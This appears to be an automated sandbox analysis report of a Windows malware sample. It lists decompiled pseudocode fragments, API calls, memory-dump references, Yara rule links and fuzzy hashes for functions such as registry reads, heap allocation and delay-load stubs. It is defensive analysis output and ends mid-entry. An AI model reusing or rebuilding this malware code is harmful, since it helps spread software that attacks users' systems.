                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3834848776-0
                                                                                                                                  • Opcode ID: 0702d270b9e40ca9fb1e865ed1bceeb3516daba28e487f514047d3f3fd3cadf5
                                                                                                                                  • Instruction ID: 60c516e43e7993734b8b4fe54cc6e2e98b19598273b3315f4cdb92b778a4e3d2
                                                                                                                                  • Opcode Fuzzy Hash: 0702d270b9e40ca9fb1e865ed1bceeb3516daba28e487f514047d3f3fd3cadf5
                                                                                                                                  • Instruction Fuzzy Hash: E7E08C39344232E7CB316BF4AD1ABABEA50AF21B90F414934F4C5E206AD610CD8283A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A31E47, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                  			E00A31E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xa3d2e0; // 0x296a5a8
				_t4 = _t15 + 0xa3e39c; // 0x33a8944
				_t20 = _t4;
				_t6 = _t15 + 0xa3e124; // 0x650047
				_t17 = E00A3144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00A325D6(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                  0x00a31e51
                                                                                                                                  0x00a31e58
                                                                                                                                  0x00a31e59
                                                                                                                                  0x00a31e5a
                                                                                                                                  0x00a31e5b
                                                                                                                                  0x00a31e61
                                                                                                                                  0x00a31e66
                                                                                                                                  0x00a31e66
                                                                                                                                  0x00a31e70
                                                                                                                                  0x00a31e82
                                                                                                                                  0x00a31e89
                                                                                                                                  0x00a31eb7
                                                                                                                                  0x00a31e8b
                                                                                                                                  0x00a31e8d
                                                                                                                                  0x00a31e92
                                                                                                                                  0x00a31eb4
                                                                                                                                  0x00a31e94
                                                                                                                                  0x00a31e97
                                                                                                                                  0x00a31e9e
                                                                                                                                  0x00a31ea3
                                                                                                                                  0x00a31ea5
                                                                                                                                  0x00a31ea5
                                                                                                                                  0x00a31eaa
                                                                                                                                  0x00a31eaa
                                                                                                                                  0x00a31e92
                                                                                                                                  0x00a31ebe

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A3144D: SysFreeString.OLEAUT32(?), ref: 00A3152C
                                                                                                                                    • Part of subcall function 00A325D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A3474F,004F0053,00000000,?), ref: 00A325DF
                                                                                                                                    • Part of subcall function 00A325D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A3474F,004F0053,00000000,?), ref: 00A32609
                                                                                                                                    • Part of subcall function 00A325D6: memset.NTDLL ref: 00A3261D
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A31EAA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 397948122-0
                                                                                                                                  • Opcode ID: 3b291aa42b502ad7b8071a8226f5e19bfb21d209e3d8199ce4088e30458ffb3e
                                                                                                                                  • Instruction ID: 0e5f7628c40138758b98e0a2be1ddc8ed10fb8e4b145f4f77079984e40222125
                                                                                                                                  • Opcode Fuzzy Hash: 3b291aa42b502ad7b8071a8226f5e19bfb21d209e3d8199ce4088e30458ffb3e
                                                                                                                                  • Instruction Fuzzy Hash: BB019A32900119BFDB11DBA8DC009BBBBB8FF08350F008121FD01E7160E771A922D791
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93146E, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,6E97A0D4,00000000), ref: 6E9314AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction ID: 33ade8be65f4f0e96915dc9de31944de636d38c0d5e1cf206d72fab4f015bedb
                                                                                                                                  • Opcode Fuzzy Hash: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction Fuzzy Hash: 2CF0E03160493557EB515AF7881CF9B37AD9F83770B31C5219C54D63A4DB30D8058DE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92F4F7, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 6E92F529
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 64a0d18479098e8249e61b7a6fe1fcc94f10701152f801b1fc03942833e6f722
                                                                                                                                  • Instruction ID: b4aae24ec62bebe0c19c65af47560dd3f1162ef81befb4fd04d73d92e0158a34
                                                                                                                                  • Opcode Fuzzy Hash: 64a0d18479098e8249e61b7a6fe1fcc94f10701152f801b1fc03942833e6f722
                                                                                                                                  • Instruction Fuzzy Hash: 87E0A0212296235EEE101EFA9804FAF365CBF426A8F2101709C14B628CEB10D8028EE0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F5C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlEncodePointer.NTDLL(?), ref: 6E8F5C69
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                  • Opcode ID: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction ID: ea0b29dbe5e6a269ff91347ced616a4077e37ffaf3acb5e122e88cc3d2e5b3f4
                                                                                                                                  • Opcode Fuzzy Hash: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction Fuzzy Hash: 21D0C9B000CF14DFDF05AF54E8147A43BB8FF07306F000428E40D93698D7B59468CA48
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AA89, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA89() {

				E00A3ABF6(0xa3c2c4, 0xa3d0f4); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 93fa63fd8a7caf77a184c1700a69054d97018a4345087e79c68a2d4795a9e7fe
                                                                                                                                  • Instruction ID: ab351739d9b6df0ab51fd29dbe21f74fdca902c7485d7ebf75c6c938a4d11cbc
                                                                                                                                  • Opcode Fuzzy Hash: 93fa63fd8a7caf77a184c1700a69054d97018a4345087e79c68a2d4795a9e7fe
                                                                                                                                  • Instruction Fuzzy Hash: 8AB0129365C011BC3108B1982F13C37021CD0D1F20F30C41BFD42C0280D8444C460133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AA93, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA93() {

				E00A3ABF6(0xa3c2c4, 0xa3d0f0); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 2ecccc3572899ac8c2837253be135582f02572d7018bef2725841c93118fffd1
                                                                                                                                  • Instruction ID: 3b7e060de51df9173b9d609cf2deace61702486ec53730d3ba2123a45d91328c
                                                                                                                                  • Opcode Fuzzy Hash: 2ecccc3572899ac8c2837253be135582f02572d7018bef2725841c93118fffd1
                                                                                                                                  • Instruction Fuzzy Hash: 84B01293658011BC3108B1882F13E37021CE0D1F20F30C41BF842C0280D8440C450133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AA3C, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA3C() {

				E00A3ABF6(0xa3c2c4, 0xa3d110); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 15dad527a8bd64dda5c9780fc79bf534755182fce9aeb1b06399fa039521284f
                                                                                                                                  • Instruction ID: a0a72c8a556d4e1576b0a8c33f351a13bf9974f1f0f562879214bca250bba1bd
                                                                                                                                  • Opcode Fuzzy Hash: 15dad527a8bd64dda5c9780fc79bf534755182fce9aeb1b06399fa039521284f
                                                                                                                                  • Instruction Fuzzy Hash: 8EB01293E58011BD312475852E03C37031DD0D0B60F30C91FF841D01C0D8440C440033
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AA61, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA61() {

				E00A3ABF6(0xa3c2c4, 0xa3d104); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 09d9c5046af6c8447efac0de94baa6c6a1ed593837edaf0a71dd6b4565d60c1f
                                                                                                                                  • Instruction ID: be56ba8164b7525b5742c13016d081084ef940833f98a04a965a435e4ee76627
                                                                                                                                  • Opcode Fuzzy Hash: 09d9c5046af6c8447efac0de94baa6c6a1ed593837edaf0a71dd6b4565d60c1f
                                                                                                                                  • Instruction Fuzzy Hash: 14B01293798011BD310471982F43C37421CC0D0B20F30C51BF841C0280D8440C451133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AA6B, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA6B() {

				E00A3ABF6(0xa3c2c4, 0xa3d100); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 4f14d2dd6c4c23d689a475b7c359dc3bd1e059ea5ec7205452c4e64647c777bd
                                                                                                                                  • Instruction ID: 86644e7901c4666752cae03c03e15df2cad49605cc27fa39ea0952e0d6372f91
                                                                                                                                  • Opcode Fuzzy Hash: 4f14d2dd6c4c23d689a475b7c359dc3bd1e059ea5ec7205452c4e64647c777bd
                                                                                                                                  • Instruction Fuzzy Hash: 65B01293798011BD310471882E03C37421CD0D0B20F30C51BF841C0280D8440C440133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AA75, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA75() {

				E00A3ABF6(0xa3c2c4, 0xa3d0fc); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 03d13d4f0f706822a5319b1712f406c10cb701539035f32d5440144966037335
                                                                                                                                  • Instruction ID: cb2cd72756872232e31262eb5888449c6bdc6b3e0b66730b35ef857e5763442e
                                                                                                                                  • Opcode Fuzzy Hash: 03d13d4f0f706822a5319b1712f406c10cb701539035f32d5440144966037335
                                                                                                                                  • Instruction Fuzzy Hash: 67B01293658011FC3108B1882E53C37021CD0D1F20F30C41BFC42C0280D8440C450133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AA7F, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA7F() {

				E00A3ABF6(0xa3c2c4, 0xa3d0f8); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: d7500057c6f908c8a49ad48b74b54876c19aec0944f2599c5b4efc96f458128f
                                                                                                                                  • Instruction ID: 76693d501790f6830603419c3530894f90d3a8353e4bc3661c5f7717bf3500e3
                                                                                                                                  • Opcode Fuzzy Hash: d7500057c6f908c8a49ad48b74b54876c19aec0944f2599c5b4efc96f458128f
                                                                                                                                  • Instruction Fuzzy Hash: 72B012D3658111BC3208B1882E53C77021CD0D1F20F30C51BF842C0280D8440C890133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AA57, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AA57() {

				E00A3ABF6(0xa3c2c4, 0xa3d108); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3aa4e
                                                                                                                                  0x00a3aa55

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AA4E
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 697a24182e0afd54b40dcd8de58b2af4a9daec722c3339a53352f7efd2c223d8
                                                                                                                                  • Instruction ID: c0ea5801cc510e5fdc5b7cadcd0fc83e3e64c90ceec671279b26bf89cbb024af
                                                                                                                                  • Opcode Fuzzy Hash: 697a24182e0afd54b40dcd8de58b2af4a9daec722c3339a53352f7efd2c223d8
                                                                                                                                  • Instruction Fuzzy Hash: 67B0129379C111BD314471886E03C37421CC0D0B20F30C61BF881C0280D8840C840133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AB31, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AB31() {

				E00A3ABF6(0xa3c344, 0xa3d134); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3ab28
                                                                                                                                  0x00a3ab2f

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AB28
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: c4446abff6670481da433d381b449aba6c244f9dbaa1bec677afd272d8cb083f
                                                                                                                                  • Instruction ID: 022e19c1e84235f955653af6199cb77e7c71f3b32f4457816b00cbea6dd7ee75
                                                                                                                                  • Opcode Fuzzy Hash: c4446abff6670481da433d381b449aba6c244f9dbaa1bec677afd272d8cb083f
                                                                                                                                  • Instruction Fuzzy Hash: 19B0129125A011FD7204551C3E13C37821EC0D0B20F30C52BF841C8140D8404C411233
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3AB16, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A3AB16() {

				E00A3ABF6(0xa3c344, 0xa3d124); // executed
				goto __eax;
			}



                                                                                                                                  0x00a3ab28
                                                                                                                                  0x00a3ab2f

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A3AB28
                                                                                                                                    • Part of subcall function 00A3ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3AC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 5323b20bc9096a58983fd681473753ff202fdba49a58070f2bcc1c3082b775df
                                                                                                                                  • Instruction ID: e666b040dbc10c0746b779de121bde40b520f6e01e3ea5fa01c0e8fe411ef6d0
                                                                                                                                  • Opcode Fuzzy Hash: 5323b20bc9096a58983fd681473753ff202fdba49a58070f2bcc1c3082b775df
                                                                                                                                  • Instruction Fuzzy Hash: ACB012B1258011FD710815183E13C3B825DC0E0B20F30C52BF841D8040D9415C411133
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D15A0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E6E8D15A0(void* __eax, intOrPtr _a4) {

				 *0x6e8d41d0 =  *0x6e8d41d0 & 0x00000000;
				_push(0);
				_push(0x6e8d41cc);
				_push(1);
				_push(_a4);
				 *0x6e8d41c8 = 0xc; // executed
				L6E8D1764(); // executed
				return __eax;
			}



                                                                                                                                  0x6e8d15a0
                                                                                                                                  0x6e8d15a7
                                                                                                                                  0x6e8d15a9
                                                                                                                                  0x6e8d15ae
                                                                                                                                  0x6e8d15b0
                                                                                                                                  0x6e8d15b4
                                                                                                                                  0x6e8d15be
                                                                                                                                  0x6e8d15c3

                                                                                                                                  APIs
                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E8D10E6,00000001,6E8D41CC,00000000), ref: 6E8D15BE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DescriptorSecurity$ConvertString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3907675253-0
                                                                                                                                  • Opcode ID: 697809cef6134be7bea67f589b1a14e7c60d2809bde67af46bf889ad1eb9601a
